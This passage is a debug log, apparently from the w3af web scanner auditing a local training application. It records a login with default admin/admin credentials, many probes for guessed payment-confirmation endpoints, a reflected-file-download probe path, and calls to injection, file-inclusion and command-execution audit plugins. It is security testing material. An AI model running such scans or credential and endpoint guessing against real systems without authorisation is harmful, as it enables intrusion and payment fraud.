http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] eval.audit(did="6NUlKkVY", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:6NUlKkVY) [Wed Feb 12 09:37:22 2020 - debug] POST http://localhost:9090/login with data: "username=admin&password=admin" returned HTTP code "302" (id=848,from_cache=0,grep=0,rtt=0.33,did=0zVJeVwK) [Wed Feb 12 09:37:22 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: z7WsWSAG) [Wed Feb 12 09:37:22 2020 - debug] xxe.audit(did="pG3uHFiq",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.14s to run [Wed Feb 12 09:37:22 2020 - debug] GET http://localhost:9090/assets/fa/css/font-awesome.min.css returned HTTP code "200" (id=849,from_cache=0,grep=1,rtt=0.11,did=PT3595wx) [Wed Feb 12 09:37:22 2020 - debug] POST http://localhost:9090/servlet/paymentcomplete returned HTTP code "404" (id=850,from_cache=0,grep=1,rtt=0.25,did=89wQNMW4) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/servlet/finished returned HTTP code "404" (id=852,from_cache=0,grep=1,rtt=0.39,did=iAlhwgn2) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/includes/validpay returned HTTP code "404" (id=854,from_cache=0,grep=1,rtt=0.44,did=H8ZwC3lQ) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/includes/transactioncomplete returned HTTP code "404" (id=855,from_cache=0,grep=1,rtt=0.22,did=vz3XTGwb) [Wed Feb 12 09:37:23 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:23 2020 - debug] rosetta_flash.audit(did="L2gIJ3cJ", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:23 2020 - debug] rosetta_flash.audit(did="L2gIJ3cJ",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:23 2020 - debug] GET http://localhost:9090/assets/fa/css/font-awesome.min.css returned HTTP code "200" (id=857,from_cache=1,grep=1,rtt=0.11,did=6oTPPGR0) [Wed Feb 12 09:37:23 2020 - debug] htaccess_methods.audit(did="MJdpWhVA",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.69s to run [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/includes/completepayment.php4 returned HTTP code "404" (id=859,from_cache=0,grep=1,rtt=0.38,did=A9mcd5SY) [Wed Feb 12 09:37:23 2020 - debug] eval.audit(did="6NUlKkVY",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.40s to run [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/module/successful returned HTTP code "404" (id=856,from_cache=0,grep=1,rtt=0.23,did=IzPjKUVf) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/module/paymentsuccessful returned HTTP code "404" (id=853,from_cache=0,grep=1,rtt=0.36,did=A7eNDNMY) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/modules/validation.php4 returned HTTP code "404" (id=851,from_cache=0,grep=1,rtt=0.21,did=iZBifpzs) [Wed Feb 12 09:37:23 2020 - debug] xss.audit(did="degtofRS", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/inc/success returned HTTP code "404" (id=861,from_cache=0,grep=1,rtt=0.38,did=auVcPyNT) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/modules/validatepay returned HTTP code "404" (id=863,from_cache=0,grep=1,rtt=0.51,did=iuU0W933) [Wed Feb 12 09:37:23 2020 - debug] POST http://localhost:9090/module/paymentsuccess returned HTTP code "404" (id=865,from_cache=0,grep=1,rtt=0.25,did=SSS1TtRZ) [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/servlet/validation returned HTTP code "404" (id=869,from_cache=0,grep=1,rtt=0.55,did=jJuhfYop) [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/modules/trxcomplete returned HTTP code "404" (id=870,from_cache=0,grep=1,rtt=0.58,did=rMkI1uZo) [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/module/completepay.php4 returned HTTP code "404" (id=871,from_cache=0,grep=1,rtt=0.59,did=RTDn2CYX) [Wed Feb 12 09:37:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 96. [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/inc/paid.php4 returned HTTP code "404" (id=873,from_cache=0,grep=1,rtt=0.66,did=tuemeNeP) [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/modules/validatepayment.php4 returned HTTP code "404" (id=860,from_cache=0,grep=1,rtt=0.26,did=FklVa1nU) [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/modules/finished.php4 returned HTTP code "404" (id=876,from_cache=0,grep=1,rtt=0.39,did=WyX23pZL) [Wed Feb 12 09:37:24 2020 - debug] POST http://localhost:9090/inc/validpay.php4 returned HTTP code "404" (id=878,from_cache=0,grep=1,rtt=0.58,did=rLsp423B) [Wed Feb 12 09:37:25 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=881,from_cache=0,grep=0,rtt=0.34,did=z7WsWSAG) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/includes/pay.php4 returned HTTP code "404" (id=883,from_cache=0,grep=1,rtt=0.64,did=wySWjTKY) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/inc/return returned HTTP code "404" (id=872,from_cache=0,grep=1,rtt=0.54,did=71ucqb5f) [Wed Feb 12 09:37:25 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/modules/complete returned HTTP code "404" (id=866,from_cache=0,grep=1,rtt=0.37,did=qSyhzO4b) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/servlet/return.php4 returned HTTP code "404" (id=862,from_cache=0,grep=1,rtt=0.48,did=8OoCgpn8) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/module/final.php4 returned HTTP code "404" (id=864,from_cache=0,grep=1,rtt=0.55,did=lSY5nQyl) [Wed Feb 12 09:37:25 2020 - debug] GET http://localhost:9090/assets/fa/css/font-awesome.min.css returned HTTP code "200" (id=884,from_cache=0,grep=1,rtt=0.09,did=PT3595wx) [Wed Feb 12 09:37:25 2020 - debug] xst.audit(did="KnxlPPjg", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/servlet/success.php4 returned HTTP code "404" (id=858,from_cache=0,grep=1,rtt=0.23,did=F1KLB4To) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/servlet/validatepayment returned HTTP code "404" (id=867,from_cache=0,grep=1,rtt=0.47,did=XF5qwF8b) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/inc/valid returned HTTP code "404" (id=868,from_cache=0,grep=1,rtt=0.36,did=KycQksyG) [Wed Feb 12 09:37:25 2020 - debug] ssl_certificate.audit(did="HUGBYeI2", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/modules/paymentcomplete.php4 returned HTTP code "404" (id=882,from_cache=0,grep=1,rtt=0.28,did=Em9NRmaK) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/includes/paid returned HTTP code "404" (id=877,from_cache=0,grep=1,rtt=0.72,did=7nLbRgmJ) [Wed Feb 12 09:37:25 2020 - debug] preg_replace.audit(did="3MJiKD05", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:25 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:25 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:3MJiKD05) [Wed Feb 12 09:37:25 2020 - debug] POST http://localhost:9090/includes/payment.php4 returned HTTP code "404" (id=874,from_cache=0,grep=1,rtt=0.52,did=VrunigMl) [Wed Feb 12 09:37:25 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:25 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:5HoV4k56) [Wed Feb 12 09:37:26 2020 - debug] POST http://localhost:9090/inc/transactioncomplete.php4 returned HTTP code "404" (id=879,from_cache=0,grep=1,rtt=0.16,did=0Dljhccn) [Wed Feb 12 09:37:26 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: z7WsWSAG) [Wed Feb 12 09:37:26 2020 - debug] Login success for admin [Wed Feb 12 09:37:26 2020 - debug] detailed._login() took 1.89s to run [Wed Feb 12 09:37:26 2020 - debug] xss.audit(did="degtofRS",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.10s to run [Wed Feb 12 09:37:26 2020 - debug] global_redirect.audit(did="Fc4TCgps",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 1.33s to run [Wed Feb 12 09:37:26 2020 - debug] xst.audit(did="KnxlPPjg",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.01s to run [Wed Feb 12 09:37:26 2020 - debug] POST http://localhost:9090/module/validate.php4 returned HTTP code "404" (id=875,from_cache=0,grep=1,rtt=0.41,did=HVSOu6Ax) [Wed Feb 12 09:37:26 2020 - debug] ssl_certificate.audit(did="HUGBYeI2",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:26 2020 - debug] cors_origin.audit(did="PT3595wx",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 1.41s to run (0.20s 14% sending HTTP requests) [Wed Feb 12 09:37:26 2020 - debug] mx_injection.audit(did="R2AkX7UE", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:R2AkX7UE) [Wed Feb 12 09:37:26 2020 - debug] preg_replace.audit(did="3MJiKD05",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.06s to run [Wed Feb 12 09:37:26 2020 - debug] ssi.audit(did="5HoV4k56",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.98s to run [Wed Feb 12 09:37:26 2020 - debug] POST http://localhost:9090/servlet/valid.php4 returned HTTP code "404" (id=880,from_cache=0,grep=1,rtt=0.60,did=GudV3z0M) [Wed Feb 12 09:37:26 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.20 seconds [Wed Feb 12 09:37:26 2020 - debug] mx_injection.audit(did="R2AkX7UE",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.05s to run [Wed Feb 12 09:37:26 2020 - debug] response_splitting.audit(did="c2jEgNdu", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:26 2020 - debug] rfd.audit(did="fGxzAW6r", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css%3B/w3af.cmd%3B/w3af.cmd" () [Wed Feb 12 09:37:26 2020 - debug] rfd.audit(did="fGxzAW6r",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:c2jEgNdu) [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 97. [Wed Feb 12 09:37:26 2020 - debug] rfi.audit(did="9thcazxY", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:9thcazxY) [Wed Feb 12 09:37:26 2020 - debug] frontpage.audit(did="rE0Dfczm", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:26 2020 - debug] response_splitting.audit(did="c2jEgNdu",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.26s to run [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 98. [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 99. [Wed Feb 12 09:37:26 2020 - debug] frontpage.audit(did="rE0Dfczm",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.06s to run [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 100. [Wed Feb 12 09:37:26 2020 - debug] RFI using local web server for URL: http://localhost:9090/assets/fa/css/font-awesome.min.css [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 101. [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 102. [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 103. [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 104. [Wed Feb 12 09:37:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 105. [Wed Feb 12 09:37:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:9thcazxY) [Wed Feb 12 09:37:26 2020 - debug] rfi.audit(did="9thcazxY",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.38s to run [Wed Feb 12 09:37:26 2020 - debug] GET http://localhost:9090/module/paymentsuccessful returned HTTP code "404" (id=885,from_cache=0,grep=1,rtt=0.15,did=nho8toVz) [Wed Feb 12 09:37:27 2020 - debug] GET http://localhost:9090/servlet/paymentcomplete returned HTTP code "404" (id=886,from_cache=0,grep=1,rtt=0.11,did=DWtmuLzs) [Wed Feb 12 09:37:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 419, 'reject-seen-url': 154, 'reject-out-of-scope': 11, 'accept': 141} [Wed Feb 12 09:37:27 2020 - debug] localhost:9090 connection pool stats (free:51 / in_use:2 / max:50 / total:53) [Wed Feb 12 09:37:27 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.06 sec) (20c6fb7a85d275d0, 0.04 sec) [Wed Feb 12 09:37:27 2020 - debug] GET http://localhost:9090/servlet/validation returned HTTP code "404" (id=889,from_cache=0,grep=1,rtt=0.16,did=6dWlXNVE) [Wed Feb 12 09:37:27 2020 - debug] GET http://localhost:9090/includes/validpay returned HTTP code "404" (id=891,from_cache=0,grep=1,rtt=0.14,did=h9QmS6hJ) [Wed Feb 12 09:37:27 2020 - debug] GET http://localhost:9090/modules/validatepayment.php4 returned HTTP code "404" (id=888,from_cache=0,grep=1,rtt=0.05,did=qvQYRMDm) [Wed Feb 12 09:37:28 2020 - debug] GET http://localhost:9090/servlet/success.php4 returned HTTP code "404" (id=893,from_cache=0,grep=1,rtt=0.04,did=gvb9vGDs) [Wed Feb 12 09:37:28 2020 - debug] GET http://localhost:9090/servlet/finished returned HTTP code "404" (id=890,from_cache=0,grep=1,rtt=0.13,did=FJsYsOY9) [Wed Feb 12 09:37:28 2020 - debug] GET http://localhost:9090/learn/vulnerability/a8_ides returned HTTP code "200" (id=894,from_cache=0,grep=0,rtt=0.21,did=zT12801r) [Wed Feb 12 09:37:28 2020 - debug] GET http://localhost:9090/module/successful returned HTTP code "404" (id=887,from_cache=0,grep=1,rtt=0.17,did=UXuM7wNI) [Wed Feb 12 09:37:28 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=261 returned HTTP code "200" (id=892,from_cache=0,grep=0,rtt=0.65,did=dE5gb8aj) [Wed Feb 12 09:37:28 2020 - debug] file_upload.audit(did="5OSUC1t4", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:28 2020 - debug] file_upload.audit(did="5OSUC1t4",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:28 2020 - debug] localhost:9090 connection pool stats (free:40 / in_use:13 / max:50 / total:53) [Wed Feb 12 09:37:28 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.60 sec) (20c6fb7a85d275d0, 0.27 sec) (33cedecc203f8322, 0.22 sec) (7e2427f5d8fccdb1, 0.21 sec) (450aace75c9d8a42, 0.19 sec) [Wed Feb 12 09:37:28 2020 - debug] GET http://localhost:9090/includes/pay.php4 returned HTTP code "404" (id=897,from_cache=0,grep=1,rtt=0.22,did=VMb7rLb4) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/servlet/return.php4 returned HTTP code "404" (id=902,from_cache=0,grep=1,rtt=0.29,did=oTLjDHPm) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/servlet/valid.php4 returned HTTP code "404" (id=903,from_cache=0,grep=1,rtt=0.22,did=FGWGmEIl) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/includes/completepayment.php4 returned HTTP code "404" (id=904,from_cache=0,grep=1,rtt=0.28,did=C9tmNWzd) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/module/completepay.php4 returned HTTP code "404" (id=906,from_cache=0,grep=1,rtt=0.66,did=xIODtfr6) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/module/final.php4 returned HTTP code "404" (id=896,from_cache=0,grep=1,rtt=0.19,did=hO7Gdalj) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/modules/paymentcomplete.php4 returned HTTP code "404" (id=895,from_cache=0,grep=1,rtt=0.27,did=VzFwifb2) [Wed Feb 12 09:37:29 2020 - debug] csrf.audit(did="g6aoXRsS", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:29 2020 - debug] csrf.audit(did="g6aoXRsS",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/modules/complete returned HTTP code "404" (id=905,from_cache=0,grep=1,rtt=0.11,did=s7SIAsjH) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/inc/paid.php4 returned HTTP code "404" (id=901,from_cache=0,grep=1,rtt=0.12,did=ynFNfpva) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/modules/validatepay returned HTTP code "404" (id=910,from_cache=0,grep=1,rtt=0.37,did=Rb9wQVoO) [Wed Feb 12 09:37:29 2020 - debug] GET http://localhost:9090/inc/valid returned HTTP code "404" (id=911,from_cache=0,grep=1,rtt=0.34,did=s73dIrIq) [Wed Feb 12 09:37:30 2020 - debug] GET http://localhost:9090/servlet/validatepayment returned HTTP code "404" (id=914,from_cache=0,grep=1,rtt=0.27,did=I4cTUEqk) [Wed Feb 12 09:37:30 2020 - debug] GET http://localhost:9090/inc/success returned HTTP code "404" (id=916,from_cache=0,grep=1,rtt=0.32,did=41m6u6As) [Wed Feb 12 09:37:30 2020 - debug] GET http://localhost:9090/module/validate.php4 returned HTTP code "404" (id=917,from_cache=0,grep=1,rtt=0.24,did=0xxZTwtB) [Wed Feb 12 09:37:30 2020 - debug] GET http://localhost:9090/module/paymentsuccess returned HTTP code "404" (id=920,from_cache=0,grep=1,rtt=0.11,did=0tc4WR8x) [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/includes/payment.php4 returned HTTP code "404" (id=919,from_cache=0,grep=1,rtt=0.16,did=YJNhUeOw) [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/includes/transactioncomplete returned HTTP code "404" (id=899,from_cache=0,grep=1,rtt=0.36,did=UOHb8QiI) [Wed Feb 12 09:37:31 2020 - debug] POST http://localhost:9090/module/paymentsuccessful.cgi returned HTTP code "404" (id=913,from_cache=0,grep=1,rtt=0.35,did=J9flC0QW) [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/inc/validpay.php4 returned HTTP code "404" (id=915,from_cache=0,grep=1,rtt=0.23,did=41meGWPx) [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/modules/validation.php4 returned HTTP code "404" (id=912,from_cache=0,grep=1,rtt=0.09,did=HR6sXVkZ) [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/modules/finished.php4 returned HTTP code "404" (id=909,from_cache=0,grep=1,rtt=0.15,did=idqXdkqm) [Wed Feb 12 09:37:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 419, 'reject-seen-url': 179, 'reject-out-of-scope': 11, 'accept': 141} [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/inc/transactioncomplete.php4 returned HTTP code "404" (id=923,from_cache=0,grep=1,rtt=0.16,did=yjAr8MAy) [Wed Feb 12 09:37:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 419, 'reject-seen-url': 179, 'reject-out-of-scope': 11, 'accept': 141} [Wed Feb 12 09:37:31 2020 - debug] POST http://localhost:9090/servlet/validation.cgi returned HTTP code "404" (id=922,from_cache=0,grep=1,rtt=0.19,did=yFGl5zQf) [Wed Feb 12 09:37:31 2020 - debug] POST http://localhost:9090/modules/validatepayment.php5 returned HTTP code "404" (id=918,from_cache=0,grep=1,rtt=0.27,did=b1COAl6P) [Wed Feb 12 09:37:31 2020 - debug] GET http://localhost:9090/inc/return returned HTTP code "404" (id=898,from_cache=0,grep=1,rtt=0.18,did=E5XjPWA1) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/servlet/success.php5 returned HTTP code "404" (id=924,from_cache=0,grep=1,rtt=0.16,did=XT57kvst) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/includes/pay.php5 returned HTTP code "404" (id=925,from_cache=0,grep=1,rtt=0.22,did=AfeBL6wo) [Wed Feb 12 09:37:32 2020 - debug] deserialization.audit(did="5XmMnkox", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] GET http://localhost:9090/includes/paid returned HTTP code "404" (id=907,from_cache=0,grep=1,rtt=0.21,did=IuAE3lfZ) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/includes/validpay.cgi returned HTTP code "404" (id=921,from_cache=0,grep=1,rtt=0.21,did=e5l1UNTe) [Wed Feb 12 09:37:32 2020 - debug] GET http://localhost:9090/modules/trxcomplete returned HTTP code "404" (id=908,from_cache=0,grep=1,rtt=0.09,did=b7vJrdbl) [Wed Feb 12 09:37:32 2020 - debug] os_commanding.audit(did="9iVFw6I2", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:9iVFw6I2) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/module/successful.cgi returned HTTP code "404" (id=927,from_cache=0,grep=1,rtt=0.23,did=LrYRrKJ5) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/servlet/finished.cgi returned HTTP code "404" (id=926,from_cache=0,grep=1,rtt=0.16,did=NjM5iDqN) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/module/completepay.php5 returned HTTP code "404" (id=928,from_cache=0,grep=1,rtt=0.09,did=D7fYaq9e) [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] lfi.audit(did="0xqHwXgc", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:32 2020 - debug] deserialization.audit(did="5XmMnkox",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.34s to run [Wed Feb 12 09:37:32 2020 - debug] localhost:9090 connection pool stats (free:43 / in_use:10 / max:50 / total:53) [Wed Feb 12 09:37:32 2020 - debug] Connections with more in use time: (20c6fb7a85d275d0, 0.33 sec) (a5419411797e137e, 0.32 sec) (ff37903b27d7f8f9, 0.26 sec) (f5adb0c09c70ca09, 0.20 sec) (450aace75c9d8a42, 0.17 sec) [Wed Feb 12 09:37:32 2020 - debug] sqli.audit(did="d85rLqWq", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:32 2020 - debug] os_commanding.audit(did="9iVFw6I2",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.37s to run [Wed Feb 12 09:37:32 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 106. [Wed Feb 12 09:37:32 2020 - debug] blind_sqli.audit(did="qoCQsbrc", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:32 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:0xqHwXgc) [Wed Feb 12 09:37:32 2020 - debug] POST http://localhost:9090/servlet/valid.php5 returned HTTP code "404" (id=929,from_cache=0,grep=1,rtt=0.21,did=T3IkeSNN) [Wed Feb 12 09:37:32 2020 - debug] phishing_vector.audit(did="r6sv1VXD", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:33 2020 - debug] POST http://localhost:9090/includes/payment.php5 returned HTTP code "404" (id=931,from_cache=0,grep=1,rtt=0.21,did=GfJitEYH) [Wed Feb 12 09:37:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:33 2020 - debug] lfi.audit(did="0xqHwXgc",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.39s to run [Wed Feb 12 09:37:33 2020 - debug] generic.audit(did="QazDcfqD", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:33 2020 - debug] generic.audit(did="QazDcfqD",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:33 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:d85rLqWq) [Wed Feb 12 09:37:33 2020 - debug] POST http://localhost:9090/inc/paid.php5 returned HTTP code "404" (id=934,from_cache=0,grep=1,rtt=0.24,did=wbzwpJ4P) [Wed Feb 12 09:37:33 2020 - debug] format_string.audit(did="sOsv8VLX", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:33 2020 - debug] POST http://localhost:9090/modules/validation.php5 returned HTTP code "404" (id=930,from_cache=0,grep=1,rtt=0.16,did=hjdukqMM) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/module/paymentsuccess.cgi returned HTTP code "404" (id=933,from_cache=0,grep=1,rtt=0.23,did=5wWs9hpX) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/modules/validatepay.cgi returned HTTP code "404" 